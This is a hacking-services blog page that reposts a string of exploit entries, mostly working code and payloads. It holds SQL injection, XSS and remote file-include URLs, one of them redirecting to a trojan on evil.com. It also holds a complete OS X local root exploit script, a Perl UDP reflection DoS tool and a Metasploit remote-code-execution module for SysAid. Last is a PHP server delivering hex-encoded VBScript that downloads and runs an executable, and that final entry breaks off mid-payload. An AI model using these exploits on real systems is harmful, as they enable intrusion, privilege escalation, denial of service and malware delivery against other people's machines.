Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863538839

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/54734/info

phpBB is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

phpBB 3.0.10 is vulnerable; other versions may also be affected. 

Request :

---
POST /kuba/phpBB/phpBB3/ucp.php?i=prefs&mode=personal HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://localhost/kuba/phpBB/phpBB3/ucp.php?i=174
Cookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid=
Content-Type: application/x-www-form-urlencoded
Content-Length: 258
Connection: close

viewemail=1
&massemail=1
&allowpm=1
&hideonline=0
&notifypm=1
&popuppm=0
&lang=en
&style=%2b1111111111
&tz=0
&dst=0
&dateoptions=D+M+d%2C+Y+g%3Ai+a
&dateformat=D+M+d%2C+Y+g%3Ai+a
&submit=Submit
&creation_time=1343370877
&form_token=576...
HireHackking 
source: https://www.securityfocus.com/bid/54822/info
 
Open Constructor is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input.
 
Exploiting these vulnerabilities could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
Open Constructor 3.12.0 is vulnerable; other versions may also be affected. 

http://www.example.com/openconstructor/data/file/edit.php?result=<script>aler('xss')</script>&id=new&ds_id=8&hybridid=&fieldid=&callback=&type=txt&name=test&description=test&fname=test&create=Save
HireHackking 
source: https://www.securityfocus.com/bid/54845/info

Dir2web is prone to multiple security vulnerabilities, including an SQL-Injection vulnerability and an information-disclosure vulnerability.

Successfully exploiting these issues allows remote attackers to compromise the software, retrieve information, modify data, disclose sensitive information, or gain unauthorized access; other attacks are also possible.

Dir2web versions 3.0 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?wpid=homepage&oid=6a303a0aaa&apos; OR id > 0-- -
HireHackking 
source: https://www.securityfocus.com/bid/54739/info

JW Player is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Note: The vulnerability related to 'logo.link' parameter has been moved to BID 55199 for better documentation. 

http://www.example.com/player.swf?playerready=alert(document.cookie)
HireHackking 
source: https://www.securityfocus.com/bid/54753/info

Limny is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Limny 3.3.1 is vulnerable; other versions may also be affected. 

 http://www.example.com/limny-3.3.1/index.php?q=-1' or 57 = '55 [SQL
HireHackking 
source: https://www.securityfocus.com/bid/54991/info

MindTouch DekiWiki is prone to multiple remote and local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary server-side script code that resides on an affected computer or in a remote location with the privileges of the web server process. This may facilitate unauthorized access.

MindTouch DekiWiki 10.1.3 is vulnerable; other versions may also be affected. 

http://www.example.com/deki/web/deki/gui/link.php?IP=http://www.example.com/shell.txt?
http://www.example.com/deki/web/deki/plugins/deki_plugin.php?IP=http://www.example.com/shell.txt?
http://www.example.com/deki/web/deki/plugins/deki_plugin.php?wgDekiPluginPath=http://www.example.com/shell.txt?
http://www.example.com/deki/web/deki/gui/link.php?IP=../../../../../../../../../windows/win.ini%00
http://www.example.com/deki/web/deki/plugins/deki_plugin.php?IP=../../../../../../../../../windows/win.ini%00
http://www.example.com/deki/web/deki/plugins/deki_plugin.php?wgDekiPluginPath=../../../../../../../../../windows/win.ini%00
HireHackking 
source: https://www.securityfocus.com/bid/55194/info

Websense Content Gateway is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

https://www.example.com:8081/monitor/m_overview.ink?mode=0&menu=</script><img%20src%3Dhttp%3A%2f%2fwww.evilanother.com%2fimages%2fcross_site.jpg>
https://www.example.com:8081/monitor/m_overview.ink?mode=0&menu=</script><meta%20http-equiv%3D%22refresh%22%20content%3D%220%3BURL%3Dhttps%3A%2f%2fwww.evil.com%2ftrojan.exe%22>
HireHackking 
#!/bin/sh
#
# Simple Proof of Concept Exploit for the DYLD_PRINT_TO_FILE
# local privilege escalation vulnerability in OS X 10.10 - 10.10.4
#
# (C) Copyright 2015 Stefan Esser <stefan.esser@sektioneins.de>
#
# Wait months for a fix from Apple or install the following KEXT as protection
# https://github.com/sektioneins/SUIDGuard
#
# Use at your own risk. This copies files around with root permissions,
# overwrites them and deletes them afterwards. Any glitch could corrupt your
# system. So you have been warned.

SUIDVICTIM=/usr/bin/newgrp

# why even try to prevent a race condition?
TARGET=`pwd`/tmpXXXXX

rm -rf $TARGET
mkdir $TARGET

cat << EOF > $TARGET/boomsh.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main()
{
        setuid(0);
        setgid(0);
        system("/bin/bash -i");
        printf("done.\n");
        return 0;
}
EOF
cat << EOF > $TARGET/overwrite.c
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>

int main(int argc, char **argv)
{
        int fd;
        char buffer[1024];
        ssize_t toread, numread;
        ssize_t numwritten;
        ssize_t size;

        /* disable O_APPEND */
        fcntl(3, F_SETFL, 0);
        lseek(3, 0, SEEK_SET);

        /* write file into it */
        fd = open(
EOF
echo "\"$TARGET/boomsh\"" >> $TARGET/overwrite.c
cat << EOF >> $TARGET/overwrite.c
        , O_RDONLY, 0);
        if (fd > 0) {

                /* determine size */
                size = lseek(fd, 0, SEEK_END);
                lseek(fd, 0, SEEK_SET);

                while (size > 0) {
                        if (size > sizeof(buffer)) {
                                toread = sizeof(buffer);
                        } else {
                                toread = size;
                        }

                        numread = read(fd, &buffer, toread);
                        if (numread < toread) {
                                fprintf(stderr, "problem reading\n");
                                _exit(2);
                        }
                        numwritten = write(3, &buffer, numread);
                        if (numread != numwritten) {
                                fprintf(stderr, "problem writing\n");
                                _exit(2);
                        }

                        size -= numwritten;

                }

                fsync(3);
                close(fd);
        } else {
                fprintf(stderr, "Cannot open for reading\n");
        }

        return 0;
}
EOF

cp $SUIDVICTIM $TARGET/backup
gcc -o $TARGET/overwrite $TARGET/overwrite.c
gcc -o $TARGET/boomsh $TARGET/boomsh.c

EDITOR=$TARGET/overwrite DYLD_PRINT_TO_FILE=$SUIDVICTIM crontab -e 2> /dev/null
echo "cp $TARGET/boomsh /usr/bin/boomsh; chmod 04755 /usr/bin/boomsh " | $SUIDVICTIM > /dev/null 2> /dev/null
echo "cp $TARGET/backup $SUIDVICTIM" | /usr/bin/boomsh > /dev/null 2> /dev/null

rm -rf $TARGET

/usr/bin/boomsh
HireHackking 
#!/usr/bin/perl
#
#  Counter-Strike 1.6 'GameInfo' Query Reflection DoS
#  Proof Of Concept
#
#  Copyright 2015 (c) Todor Donev 
#  todor.donev@gmail.com
#  http://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#  http://pastebin.com/u/hackerscommunity 
#
#
#  Disclaimer:
#  This or previous program is for Educational
#  purpose ONLY. Do not use it without permission.
#  The usual disclaimer applies, especially the
#  fact that Todor Donev is not liable for any
#  damages caused by direct or indirect use of the
#  information or functionality provided by these
#  programs. The author or any Internet provider
#  bears NO responsibility for content or misuse
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact
#  that any damage (dataloss, system crash,
#  system compromise, etc.) caused by the use
#  of these programs is not Todor Donev's
#  responsibility.
#
#  Use at your own risk and educational 
#  purpose ONLY!
#
#  See also, UDP-based Amplification Attacks:
#  https://www.us-cert.gov/ncas/alerts/TA14-017A
#
#  # perl cstrike-drdos-poc.pl 46.165.194.16 192.168.1.10 27010
#  [ Counter-Strike 1.6 'GameInfo' query reflection dos poc
#  [ Sending GameInfo requests: 46.165.194.16 -> 192.168.1.10  
#  ^C
#
#  # tcpdump -i eth0 -c4 port 27010
#  tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
#  listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
#  00:00:00.000000 IP 192.168.1.10.31337 > masterserver.css.setti.info.27010: UDP, length 25
#  00:00:00.000000 IP masterserver.css.setti.info.27010 > 192.168.1.10.31337: UDP, length 1392
#  00:00:00.000000 IP 192.168.1.10.31337 > masterserver.css.setti.info.27010: UDP, length 25
#  00:00:00.000000 IP masterserver.css.setti.info.27010 > 192.168.1.10.31337: UDP, length 1392
#  4 packets captured
#  4 packets received by filter
#  0 packets dropped by kernel


use strict;
use Socket;
use warnings;
no warnings 'uninitialized';

print "[ Counter-Strike 1.6 \'GameInfo\' query reflection dos poc\n";
die "[ Sorry, must be run as root. This script use RAW Socket.\n" if ($< != 0);
my $css         = (gethostbyname($ARGV[0]))[4];         # IP Address Destination        (32 bits)
my $victim      = (gethostbyname($ARGV[1]))[4];         # IP Address Source             (32 bits)
my $port        = $ARGV[2] || '27015';                  # Int between 1 and 65535        Default: 27015
die "[ Port must be between 1 and 65535!\n" if ($port < 1 || $port > 65535);
if (!defined $css || !defined $victim) {
    print "[ Usg: $0 <cstrike server> <victim> <port>\n";
    print "[ Default port: 27015\n";
    print "[ <todor.donev\@gmail.com> Todor Donev\n";
    exit;
}

print "[ Sending GameInfo requests: $ARGV[0] -> $ARGV[1]\n";
socket(RAW, AF_INET, SOCK_RAW, 255)             || die $!;
setsockopt(RAW, 0, 1, 1)                        || die $!;
main();

    # Main program
sub main {
    my $packet;
    
    $packet = iphdr();
    $packet .= udphdr();
    $packet .= cshdr();
    # b000000m...
    send_packet($packet);
}

    # IP header (Layer 3)
sub iphdr {
    my $ip_ver         	= 4;                                    # IP Version 4                  (4 bits)
    my $iphdr_len      	= 5;                                    # IP Header Length              (4 bits)
    my $ip_tos         	= 0;                                    # Differentiated Services       (8 bits)
    my $ip_total_len   	= $iphdr_len + 20;                      # IP Header Length + Data      (16 bits)
    my $ip_frag_id     	= 0;                                    # Identification Field         (16 bits)
    my $ip_frag_flag   	= 000;                                  # IP Frag Flags (R DF MF)       (3 bits)
    my $ip_frag_offset 	= 0000000000000;                        # IP Fragment Offset           (13 bits)
    my $ip_ttl         	= 255;                                  # IP TTL                        (8 bits)
    my $ip_proto       	= 17;                                   # IP Protocol                   (8 bits)
    my $ip_checksum    	= 0;                                    # IP Checksum                  (16 bits)

    # IP Packet
	my $iphdr       = pack(
                        'H2 H2 n n B16 h2 c n a4 a4',
                        $ip_ver . $iphdr_len, $ip_tos, 
                        $ip_total_len, $ip_frag_id, 
                        $ip_frag_flag . $ip_frag_offset,
                        $ip_ttl, $ip_proto, $ip_checksum,
                        $victim, $css
                        );
                        return $iphdr;
}

    # UDP Header (Layer 4)
sub udphdr {
    my $udp_src_port	= 31337;                        # UDP Sort Port         (16 bits) (0-65535)
    my $udp_dst_port	= $port;                        # UDP Dest Port         (16 btis) (0-65535)
    my $udp_len		= 8 + length(cshdr());          # UDP Length            (16 bits) (0-65535)
    my $udp_checksum 	= 0;                            # UDP Checksum          (16 bits) (XOR of header)

    # UDP Packet
    my $udphdr		= pack(
			'n n n n',
			$udp_src_port, 
			$udp_dst_port,
			$udp_len, 
			$udp_checksum
			);
	return $udphdr;
}

   # Counter-Strike 'GameInfo' request 
sub cshdr {

#
# https://developer.valvesoftware.com/wiki/Server_queries
#
# https://developer.valvesoftware.com/wiki/Source_RCON_Protocol
# Requests
# The server responds to 5 queries:
#
#          A2S_INFO   'T' (0x54) 
#    Basic information about the server. 
#          A2S_PLAYER 'U' (0x55)  
#    Details about each player on the server. 
#          A2S_RULES  'V' (0x56) 
#    The rules the server is using. 
#          A2A_PING   'i' (0x69)
#    Ping the server. (DEPRECATED) 
# A2S_SERVERQUERY_GETCHALLENGE  'W' (0x57)
#    Returns a challenge number for use in the player and rules query. (DEPRECATED) 
#
# Queries should be sent in UDP packets to the listen port of the server. 
#
 
# 25 bytes - A2S_INFO
    my $query            = "\xff\xff\xff\xff\x54";      # 0000   ff ff ff ff 54 53 6f 75 72 63 65 20 45 6e 67 69  ....TSource Engi
       $query           .= "\x53\x6f\x75\x72\x63";      # 0010   6e 65 20 51 75 65 72 79 00                       ne Query.
       $query           .= "\x65\x20\x45\x6e\x67";	
       $query           .= "\x69\x6e\x65\x20\x51";	
       $query           .= "\x75\x65\x72\x79\x00";	

    my $cshdr            = pack('a*', $query);
return $cshdr;
}

sub send_packet {
    while(1){
    select(undef, undef, undef, 0.40);                  # Sleep 400 milliseconds
    send(RAW, $_[0], 0, pack('Sna4x8', AF_INET, 60, $css))  || die $!;
   }
}
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'zlib'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'        => "SysAid Help Desk 'rdslogs' Arbitrary File Upload",
      'Description' => %q{
        This module exploits a file upload vulnerability in SysAid Help Desk v14.3 and v14.4.
        The vulnerability exists in the RdsLogsEntry servlet which accepts unauthenticated
        file uploads and handles zip file contents in a insecure way. By combining both weaknesses,
        a remote attacker can accomplish remote code execution. Note that this will only work if the
        target is running Java 6 or 7 up to 7u25, as Java 7u40 and above introduces a protection
        against null byte injection in file names. This module has been tested successfully on version
        v14.3.12 b22 and v14.4.32 b25 in Linux. In theory this module also works on Windows, but SysAid
        seems to bundle Java 7u40 and above with the Windows package which prevents the vulnerability
        from being exploited.
      },
      'Author'       =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2015-2995' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
          [ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ]
        ],
      'DefaultOptions' => { 'WfsDelay' => 30 },
      'Privileged'  => false,
      'Platform'    => 'java',
      'Arch'        => ARCH_JAVA,
      'Targets'     =>
        [
          [ 'SysAid Help Desk v14.3 - 14.4 / Java Universal', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jun 3 2015'))

    register_options(
      [
        Opt::RPORT(8080),
        OptInt.new('SLEEP',
          [true, 'Seconds to sleep while we wait for WAR deployment', 15]),
        OptString.new('TARGETURI',
          [true, 'Base path to the SysAid application', '/sysaid/'])
      ], self.class)
  end


  def check
    servlet_path = 'rdslogs'
    bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))

    res = send_request_cgi({
      'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
      'method' => 'POST',
      'vars_get' => {
        'rdsName' => bogus_file
      }
    })

    if res && res.code == 200
      return Exploit::CheckCode::Detected
    end
  end


  def exploit
    app_base = rand_text_alphanumeric(4 + rand(32 - 4))
    tomcat_path = '../../../../'
    servlet_path = 'rdslogs'

    # We need to create the upload directories before our first attempt to upload the WAR.
    print_status("#{peer} - Creating upload directory")
    bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
    send_request_cgi({
      'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
      'method' => 'POST',
      'data' => Zlib::Deflate.deflate(rand_text_alphanumeric(4 + rand(32 - 4))),
      'ctype' => 'application/xml',
      'vars_get' => {
        'rdsName' => bogus_file
      }
    })

    war_payload = payload.encoded_war({ :app_name => app_base }).to_s

    # We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail
    print_status("#{peer} - Uploading WAR file...")
    res = send_request_cgi({
      'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
      'method' => 'POST',
      'data' => Zlib::Deflate.deflate(war_payload),
      'ctype' => 'application/octet-stream',
      'vars_get' => {
        'rdsName' => "#{tomcat_path}/tomcat/webapps/#{app_base}.war\x00"
      }
    })

    # The server either returns a 200 OK when the upload is successful.
    if res && res.code == 200
      print_status("#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment")
      register_files_for_cleanup("tomcat/webapps/#{app_base}.war")
    else
      fail_with(Failure::Unknown, "#{peer} - WAR upload failed")
    end

    10.times do
      select(nil, nil, nil, 2)

      # Now make a request to trigger the newly deployed war
      print_status("#{peer} - Attempting to launch payload in deployed WAR...")
      res = send_request_cgi({
        'uri'    => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
        'method' => 'GET'
      })
      # Failure. The request timed out or the server went away.
      break if res.nil?
      # Success! Triggered the payload, should have a shell incoming
      break if res.code == 200
    end
  end
end
HireHackking 
#!/usr/bin/php
<?php
    # Title : Internet Download Manager - OLE Automation Array Remote Code Execution
    # Affected Versions: All Version
    # Founder : InternetDownloadManager
    # Tested on Windows 7 / Server 2008
    #
    #
    # Author      :   Mohammad Reza Espargham
    # Linkedin    :   https://ir.linkedin.com/in/rezasp
    # E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
    # Website     :   www.reza.es
    # Twitter     :   https://twitter.com/rezesp
    # FaceBook    :   https://www.facebook.com/mohammadreza.espargham
    #
    #
    # OleAut32.dll Exploit MS14-064 CVE2014-6332
    #
    #
    # 1 . run php code : php idm.php
    # 2 . open "IDM"
    # 3 . Form Menu -    Tasks --> Run Site Grabber
    # 4 . Enter any word "Start page/address"
    # 5 . Click Addvance
    # 6 . check "Enter Login and password manually at the following web page"
    # 7 . Enter your exploit link http://ipaddress:80/
    # 8 . Next -->  Next -->  Next -->  Next
    # 9 . Your Link Download/Execute on your target
    # 10 . Finished ;)
    #
    #
    #Demo : http://youtu.be/fAUAX7UjXLg
    
    $port=80; # Port Address
    $link="http://10.211.55.3/putty.exe"; # Your exe link
    
    $reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!');
    socket_bind($reza, 0,$port);
    socket_listen($reza);
    print "    Mohammad Reza Espargham\n   www.reza.es\n\nYour Link = http://ipaddress:$port / http://127.0.0.1:$port\n\n";
    
    $msg =
    "\x3c\x68\x74\x6d\x6c\x3e\x0d\x0a\x3c\x6d\x65\x74\x61\x20\x68\x74\x74\x70\x2d\x65\x71\x75\x69\x76".
    "\x3d\x22\x58\x2d\x55\x41\x2d\x43\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x22\x20\x63\x6f\x6e\x74\x65".
    "\x6e\x74\x3d\x22\x49\x45\x3d\x45\x6d\x75\x6c\x61\x74\x65\x49\x45\x38\x22\x20\x3e\x0d\x0a\x3c\x68".
    "\x65\x61\x64\x3e\x0d\x0a\x3c\x2f\x68\x65\x61\x64\x3e\x0d\x0a\x3c\x62\x6f\x64\x79\x3e\x0d\x0a\x20".
    "\x0d\x0a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55\x41\x47\x45\x3d\x22\x56\x42\x53\x63".
    "\x72\x69\x70\x74\x22\x3e\x0d\x0a\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x72\x75\x6e\x6d\x75".
    "\x6d\x61\x61\x28\x29\x20\x0d\x0a\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20".
    "\x4e\x65\x78\x74\x0d\x0a\x73\x65\x74\x20\x73\x68\x65\x6c\x6c\x3d\x63\x72\x65\x61\x74\x65\x6f\x62".
    "\x6a\x65\x63\x74\x28\x22\x53\x68\x65\x6c\x6c\x2e\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x22".
    "\x29\x0d\x0a\x63\x6f\x6d\x6d\x61\x6e\x64\x3d\x22\x49\x6e\x76\x6f\x6b\x65\x2d\x45\x78\x70\x72\x65".
    "\x73\x73\x69\x6f\x6e\x20\x24\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x53\x79\x73\x74\x65".
    "\x6d\x2e\x4e\x65\x74\x2e\x57\x65\x62\x43\x6c\x69\x65\x6e\x74\x29\x2e\x44\x6f\x77\x6e\x6c\x6f\x61".
    "\x64\x46\x69\x6c\x65\x28\x27\x46\x49\x4c\x45\x5f\x44\x4f\x57\x4e\x4c\x4f\x41\x44\x27\x2c\x27\x6c".
    "\x6f\x61\x64\x2e\x65\x78\x65\x27\x29\x3b\x24\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x2d".
    "\x63\x6f\x6d\x20\x53\x68\x65\x6c\x6c\x2e\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x29\x2e\x53".
    "\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x28\x27\x6c\x6f\x61\x64\x2e\x65\x78\x65\x27\x29\x3b".
    "\x22\x0d\x0a\x73\x68\x65\x6c\x6c\x2e\x53\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x20\x22\x70".
    "\x6f\x77\x65\x72\x73\x68\x65\x6c\x6c\x2e\x65\x78\x65\x22\x2c\x20\x22\x2d\x43\x6f\x6d\x6d\x61\x6e".
    "\x64\x20\x22\x20\x26\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x2c\x20\x22\x22\x2c\x20\x22\x72\x75\x6e\x61".
    "\x73\x22\x2c\x20\x30\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x3c\x2f\x73".
    "\x63\x72\x69\x70\x74\x3e\x0d\x0a\x20\x0d\x0a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55".
    "\x41\x47\x45\x3d\x22\x56\x42\x53\x63\x72\x69\x70\x74\x22\x3e\x0d\x0a\x20\x20\x0d\x0a\x64\x69\x6d".
    "\x20\x20\x20\x61\x61\x28\x29\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x62\x28\x29\x0d\x0a\x64\x69\x6d".
    "\x20\x20\x20\x61\x30\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x31\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61".
    "\x32\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x33\x0d\x0a\x64\x69\x6d\x20\x20\x20\x77\x69\x6e\x39\x78".
    "\x0d\x0a\x64\x69\x6d\x20\x20\x20\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x0d\x0a\x64\x69\x6d\x20".
    "\x20\x20\x72\x6e\x64\x61\x0d\x0a\x64\x69\x6d\x20\x20\x20\x66\x75\x6e\x63\x6c\x61\x73\x73\x0d\x0a".
    "\x64\x69\x6d\x20\x20\x20\x6d\x79\x61\x72\x72\x61\x79\x0d\x0a\x20\x0d\x0a\x42\x65\x67\x69\x6e\x28".
    "\x29\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x42\x65\x67\x69\x6e\x28\x29\x0d\x0a".
    "\x20\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a".
    "\x20\x20\x69\x6e\x66\x6f\x3d\x4e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x55\x73\x65\x72\x41\x67\x65".
    "\x6e\x74\x0d\x0a\x20\x0d\x0a\x20\x20\x69\x66\x28\x69\x6e\x73\x74\x72\x28\x69\x6e\x66\x6f\x2c\x22".
    "\x57\x69\x6e\x36\x34\x22\x29\x3e\x30\x29\x20\x20\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20".
    "\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x20\x65\x6e\x64\x20\x69".
    "\x66\x0d\x0a\x20\x0d\x0a\x20\x20\x69\x66\x20\x28\x69\x6e\x73\x74\x72\x28\x69\x6e\x66\x6f\x2c\x22".
    "\x4d\x53\x49\x45\x22\x29\x3e\x30\x29\x20\x20\x20\x74\x68\x65\x6e\x20\x0d\x0a\x20\x20\x20\x20\x20".
    "\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x20\x3d\x20\x43\x49\x6e".
    "\x74\x28\x4d\x69\x64\x28\x69\x6e\x66\x6f\x2c\x20\x49\x6e\x53\x74\x72\x28\x69\x6e\x66\x6f\x2c\x20".
    "\x22\x4d\x53\x49\x45\x22\x29\x20\x2b\x20\x35\x2c\x20\x32\x29\x29\x20\x20\x20\x0d\x0a\x20\x20\x65".
    "\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6e\x63\x74\x69\x6f".
    "\x6e\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x65".
    "\x6e\x64\x20\x69\x66\x0d\x0a\x20\x0d\x0a\x20\x20\x77\x69\x6e\x39\x78\x3d\x30\x0d\x0a\x20\x0d\x0a".
    "\x20\x20\x42\x65\x67\x69\x6e\x49\x6e\x69\x74\x28\x29\x0d\x0a\x20\x20\x49\x66\x20\x43\x72\x65\x61".
    "\x74\x65\x28\x29\x3d\x54\x72\x75\x65\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x61".
    "\x72\x72\x61\x79\x3d\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68".
    "\x72\x77\x28\x32\x31\x37\x36\x29\x26\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68\x72\x77\x28\x30".
    "\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72".
    "\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x61".
    "\x72\x72\x61\x79\x3d\x6d\x79\x61\x72\x72\x61\x79\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68".
    "\x72\x77\x28\x33\x32\x37\x36\x37\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28".
    "\x30\x29\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6e\x74\x56\x65\x72\x73\x69\x6f".
    "\x6e\x3c\x34\x29\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6f\x63\x75".
    "\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x62\x72\x3e\x20\x49\x45\x22\x29\x0d\x0a\x20".
    "\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x69".
    "\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x75\x6e".
    "\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x28\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
    "\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x20\x20\x0d\x0a\x20\x20".
    "\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x74\x6e\x6f\x74\x73\x61\x66\x65\x6d\x6f\x64\x65\x28\x29".
    "\x0d\x0a\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x65\x6e\x64\x20\x69\x66\x0d".
    "\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69".
    "\x6f\x6e\x20\x42\x65\x67\x69\x6e\x49\x6e\x69\x74\x28\x29\x0d\x0a\x20\x20\x20\x52\x61\x6e\x64\x6f".
    "\x6d\x69\x7a\x65\x28\x29\x0d\x0a\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x61\x61\x28\x35\x29\x0d\x0a".
    "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x61\x62\x28\x35\x29\x0d\x0a\x20\x20\x20\x61\x30\x3d\x31\x33".
    "\x2b\x31\x37\x2a\x72\x6e\x64\x28\x36\x29\x0d\x0a\x20\x20\x20\x61\x33\x3d\x37\x2b\x33\x2a\x72\x6e".
    "\x64\x28\x35\x29\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x66".
